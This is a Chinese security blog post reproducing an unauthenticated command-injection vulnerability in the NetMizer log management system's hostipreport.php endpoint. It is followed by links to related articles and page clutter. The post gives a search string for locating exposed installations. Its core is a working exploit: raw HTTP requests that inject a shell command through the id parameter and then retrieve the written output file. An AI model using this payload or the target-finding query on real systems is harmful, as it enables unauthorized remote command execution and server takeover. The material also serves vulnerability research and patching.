NetMizer日志管理系统hostipreport接口存在RCE

原创 已于 2025-05-20 15:22:55 修改 · 270 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #漏洞复现 #漏洞利用 #漏洞库 #网络安全

于 2025-05-20 15:20:26 首次发布

免责声明

本文章仅做网络安全技术研究使用!严禁用于非法犯罪行为,请严格遵守国家法律法规;请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

一、问题描述

NetMizer 日志管理系统hostipreport接口处存在命令执行,未经身份验证的攻击者可通过该问题在服务器端任意执行命令,写入后门,获取服务器权限,进而控制整个web服务器。

二、资产测绘

title="NetMizer 日志管理系统"

三、问题复现

GET /data/yxproject/hostipreport.php?action=showtask&id=;id>test123.txt; HTTP/1.1
Host: 
User-Agent: Moziilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

访问路径获取文件

GET /data/yxproject/test123.txt HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
NetMizer 日志管理系统 多处前台RCE漏洞复现
0xSec
02-15 1341
NetMizer 日志管理系统position.php、hostdelay.php、等接口存在命令执行漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行命令,写入后门,获取服务器权限,进而控制整个web服务器。
漏洞复现NetMizer 日志管理系统 hostdelay.php 前台RCE漏洞复现
m0_71944965的博客
12-30 569
NetMizer日志管理系统hostdelay.php接口存在命令执行漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行命令,获取服务器权限。
NetMizer 日志管理未授权访问+FTP登录
失心少年
08-04 437
北京灵州网络技术有限公司NetMizer日志管理系统存在目录遍历漏洞,由于 /data 控制不严格,攻击者可利用漏洞获取敏感信息。
NetMizer-日志管理系统-登录绕过漏洞
2401_85578339的博客
03-25 329
NetMizer 日志管理系统存在登录绕过漏洞,通过限制某个请求包的发送获取后台权限。
NetMizer日志docker
xiaopeng_thriller的博客
05-25 353
今安装日志的时候发现给的是CENTOS 7 的日志但是灵州日志不支持,随后通过docker运行centos 6 灵州日志docker docker pull centos:centos6.6 //https://hub.docker.com/_/centos?tab=tags ,拉取docker镜像 docker image run -it -v /bakcdr:/home -p 8080:80 centos:centos6.6 /bin/bash // 将宿主机
NetMizer 日志管理系统 cmd.php 远程命令执行漏洞(CVE-2025-0001)
shelter1234567的博客
02-14 220
NetMizer 日志管理系统 cmd.php 远程命令执行漏洞NetMizer 日志管理系统 cmd.php中存在远程命令执行漏洞,攻击者通过传入 cmd参数即可命令执行
NetMizer日志管理系统position(1)
2401_84519929的博客
05-17 368
NetMizer日志管理系统position.php接口存在命令执行漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行命令,获取服务器权限。NetMizer日志管理系统是一款可以记录流经设备的所有会话日志,并将其传送到外部的管理中心上的系统。app=”NetMizer-日志管理系统
NetMizer日志管理系统position.php命令执行
weixin_43567873的博客
03-08 146
NetMizer日志管理系统position.php命令执行
Heybbs-2.0前台SQL注入漏洞复现
1匹黑马
01-24 1006
文章目录前言代码审计漏洞验证临时修复 前言 这个漏洞的成因主要是因为程序对用户的输入没有进行过滤而导致的 这个bbs也是我挖的前一天才更新的,还说已经解决了SQL注入的问题,我看了下源码,属实解决了个寂寞啊… 代码审计 手动测试了一下,And 1=1 返回正常 And 1=2 返回404页面 先来看一下msg.php的代码吧 可以看到,GET过来的id直接赋值给了$id,下面的sql语句也是直接拼接进去的,连个单引号都没加 再来看一下user.php 嗯,的确是一个人写的代码,一样的没有加过滤之类
NetMizer 日志管理系统前台RCE漏洞
故事讲予风听
05-30 1401
NetMizer日志管理系统是一个与NetMizer流量管理设备配合使用的外挂系统,通常安装在一台独立的Windows服务器上,NetMizer是提供集成应用交付和应用安全解决方案以实现业务智能网络的全球供应商。它为全球企业和运营商提供确保关键业务应用的全面可用性、高性能和完善的安全性的解决方案。
Discuz中自定义搜索链接
baijieyou3149的博客
07-20 694
<a herf="search.php?mod=forum&srchtxt={KEYWORD_TO_SEARCH}&searchsubmit=yes"> XXX </a> 转载于:https://www.cnblogs.com/charlesathome/p/3855945.html
完全仿真代码审计|基于SQL注入漏洞
weixin_59005129的博客
02-14 1113
后台SQL注入  后台 SQL 注入漏洞 和 前台 SQL 注入漏洞 的主要区别在于攻击面和影响范围: 后台 SQL 注入: 发生在管理员或内部人员使用的后台系统中。 攻击者通常需要一定的权限才能访问后台功能。 危害更大,可能导致整个数据库被控制或敏感数据泄露。 前台 SQL 注入: 发生在用户可直接访问的前台页面(如登录、搜索功能)。 攻击门槛较低,普通用户即可尝试利用。 影响范围通常局限于当前用户权限内的数据。 后台注入危害更大但更难利用,前台注入更易利用但影响相对有限。
NetMizer-日志管理系统-远程命令执行漏洞挖掘
2301_81383433的博客
03-25 449
NetMizer 日志管理系统 cmd.php中存在远程命令执行漏洞,攻击者通过传入 cmd参数即可命令执行。
日志管理系统
热门推荐
samson
06-26 3万+
一.为什么需要日志管理系统 保留现场 自知者自明 所有即将发生的,都取决于已经发生的 数据商业化运作 1.1 日志管理系统的解决方案 机器上的日志实时收集,存储到日志中心 给日志建立索引,通过索引能很快找到日志 架设web界面,在web上完成日志的搜索 1.2 日志管理系统的困难 日志量很大,每天几十亿条 日志的实时收集,延迟控制在分钟级别 能够在线水平扩展 1.3 业内解决方...
高压线防外破警示灯:电力安全与智能预警的守护者
最新发布
ShenZhenDingYue的博客
12-19 597
高压输电线路防外破智能预警系统已成为现代电网安全防护的重要装备。该系统集雷达探测、AI识别、声光报警与远程通讯于一体,通过24小时主动监测线路通道内的机械入侵行为,实现风险分级预警。相比传统警示牌,其优势在于:主动交互式警示(爆闪灯+语音)、多传感器融合(雷达+激光+电场感应)降低误报率、实时数据上传形成闭环管理。典型应用场景包括施工区、交通跨越段及农林作业区。选购时需关注感应距离、供电续航、防护等级等关键指标。该系统正从单一设备向与无人机、卫星联动的综合防御体系发展,是电网安全从"人防&quot
加热激光雪深监测站守护冬季道路安全
pingao141378的博客
12-17 353
设备采用相位式激光测距技术,通过无线电波段频率调制激光束,精准捕捉往返雪面的相位延迟,测量误差仅 ±2%,分辨率达 1mm,能清晰捕捉从 0.05 米薄雪到 5 米厚雪的动态变化。而加热激光雪深监测站搭载 “主动加热 + 被动防霜” 双重防护体系,内置自动温控加热模块,当探头温度接近冰点时自动启动 15W 功耗加热,快速融化薄霜并预防结冰,配合 IP65 高防护等级外壳与纳米防霜涂层,即便在 100 高湿度环境中也能隔绝雨雪沙尘,实现 7×24 小时不间断监测,解决了低温停机的行业痛点。
网络安全中级阶段学习笔记(七):Web 安全之文件上传漏洞笔记1(包含upload-labs-master靶场前三关实战)
2501_91976946的博客
12-15 892
摘要:本文系统梳理文件上传漏洞攻防要点,包含漏洞定义、危害(如Webshell控制服务器)、检测流程及多种绕过技巧(JS验证、MIME-Type、黑名单等)。重点提出"白名单+多环节验证"防御方案,包括严格后缀验证、文件类型检测、权限控制等。补充靶场实践案例,演示通过修改后缀、利用解析特性实现漏洞利用。强调防御需结合前端限制、服务端校验与安全监控,构建纵深防护体系。
蛋白质AI设计时代的生物安全:筑牢核酸合成的“安检门”
haisendashuju的博客
12-16 294
研究团队进行了一次系统的“AI红队”测试:他们利用ProteinMPNN等公开可用的AI蛋白设计工具,对72种已知的危险野生型蛋白进行了大规模“改头换面”,生成了超过7.6万个合成同源序列。其中,AI辅助的蛋白质设计尤为引人瞩目,它让科学家得以在浩瀚的“蛋白宇宙”中高效探索,定制具有特定功能的全新蛋白质,为攻克疾病、开发新材料带来革命性希望。然而,这项强大技术的普及也如同打开了“潘多拉魔盒”,引发了深刻的生物安全隐忧:倘若有人意图合成有害的蛋白质,日益“聪明”的AI设计工具是否会成为其帮凶?
孤能子视角:人工智能的“安全对齐“与“共享学习“
水如烟
12-19 509
所以,您的问题正是症结所在:现在的AI是一个没有历史、没有身体、却可能很快拥有巨力的“天才婴儿”。EIS理论并不幻想能立刻赋予它千年的智慧,而是严峻地指出:在它通过我们设计的、堪比文明史难度的“关系动力学课程”之前,我们必须像对待一个拥有核按钮天赋的婴儿一样,以最大的谨慎、最冗余的约束、最悲观的风险评估来对待它。我们无法让它瞬间获得“如果不这么做那么就会……”的鲜活恐惧,但我们可以通过高保真的模拟,让它“计算”出同样的结论;并通过严格控制其行动范围,确保在它真正“理解”之前,没有能力造成不可逆的伤害。
NetMizer系列:深度解析与智能带宽管理技术白皮书
网优先锋(NetMizer)系列产品技术白皮书是由北京灵州网络技术有限公司发布,针对中国网络安全和网络管理领域的需求,提出了一套创新型的解决方案。该系列产品的核心在于深度内容分析、深层速率控制和智能会话管理等...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值